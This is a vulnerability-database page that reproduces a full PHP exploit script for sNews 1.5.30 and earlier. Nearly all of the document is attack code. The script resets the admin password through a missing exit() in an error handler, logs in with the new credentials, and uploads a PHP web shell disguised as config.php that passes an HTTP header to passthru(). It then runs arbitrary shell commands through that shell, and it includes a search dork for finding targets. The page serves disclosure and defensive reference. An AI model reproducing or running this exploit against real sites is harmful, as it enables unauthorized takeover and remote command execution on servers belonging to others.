Vulners
Lucene search
sNews <= 1.5.30 Remote Reset Admin Pass / Command Exec Exploit
<?php
print_r('
---------------------------------------------------------------------------
sNews <= 1.5.30 unauthorized access / reset admin pass / cmd exec exploit
by rgod
dork: "Barbecued by sNews"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
works regardless of php.ini settings
*/
if ($argc<5) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path your_ip cmd [options]
host: target server (ip/hostname)
path: path to sNews
your_ip: your ip address, this is needed for upload
this is automatically set to your proxy ip, if you use one
cmd: a shell comand
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /snews/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost / cat snews.php -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$your_ip=$argv[3];
$port=80;
$proxy="";
$cmd="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
$tmp=explode(":",$proxy);
$your_ip=$tmp[0];
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
/*
software site: http://www.solucija.com/home/snews/
you can have unauthorized access to admin password reset feature and other ones,
after that you can upload a php file and launch commands
see snews.php near lines 392-395:
...
function center() {
if (isset($_GET['category'])) {$id = $action = $_GET['category'];}
if (isset($_GET['articleid'])) {$articleid = $_GET['articleid'];}
if (isset($_POST['submit_text'])) {processing(); $processed = true;}
...
now look at processing() function near line 1300:
...
function processing() {
if ($_SESSION[db('website').'Logged_In'] != 'True') {notification(l('error_not_logged_in'),'','login/');}
...
and to notification() one near lines 675-680:
...
function notification($error, $errNote, $link) {
$errNote = !empty($errNote) ? '<br />'.$errNote : '';
echo '<h2'.(!empty($error) ? ' class="error">'.l('admin_error').'</h2><p>'.$error.$errNote.'</p>' : '>'.l('operation_completed').'</h2>');
echo (!empty($link)) ? '<p><a href="'.db('website').$link.'" title="'.l('back').'">'.l('back').'</a></p>' : '';
}
...
funny! there is no exit() or die()...
this one reset the admin password and try to upload a php file
*/
$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit_text";
1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="task";
changeup
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit_pass";
1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="uname";
suntzu
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pass1";
suntzu
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pass2";
suntzu
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$data ="uname=suntzu";
$data.="&pass=suntzu";
$data.="&Loginform=True";
$data.="&submit=Login";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!eregi("Admin</legend>",$html)){die("exploit failed...");}
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<count($temp);$i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=trim(str_replace("\n","",str_replace("\r","",$temp2[0])));
}
//echo "cookie -> ".$cookie."\n";
$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="upload_dir";
.
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="imagefile"; filename="config.php"
Content-Type: image/jpeg;
<?php error_reporting(0); set_time_limit(0); echo "my_delim"; passthru($_SERVER["HTTP_SUNTZU"]); echo "my_delim";?>
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="ip";
'.$your_ip.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="time";
1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="upload";
Upload
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p."files/ HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: ".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("my_delim",$html))
{
$temp=explode("my_delim",$html);
echo $temp[1];
}
else
{
echo "exploit succeeded... but, for some reason, failed to upload shell, try to login manually with user 'suntzu' & password 'suntzu'";
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1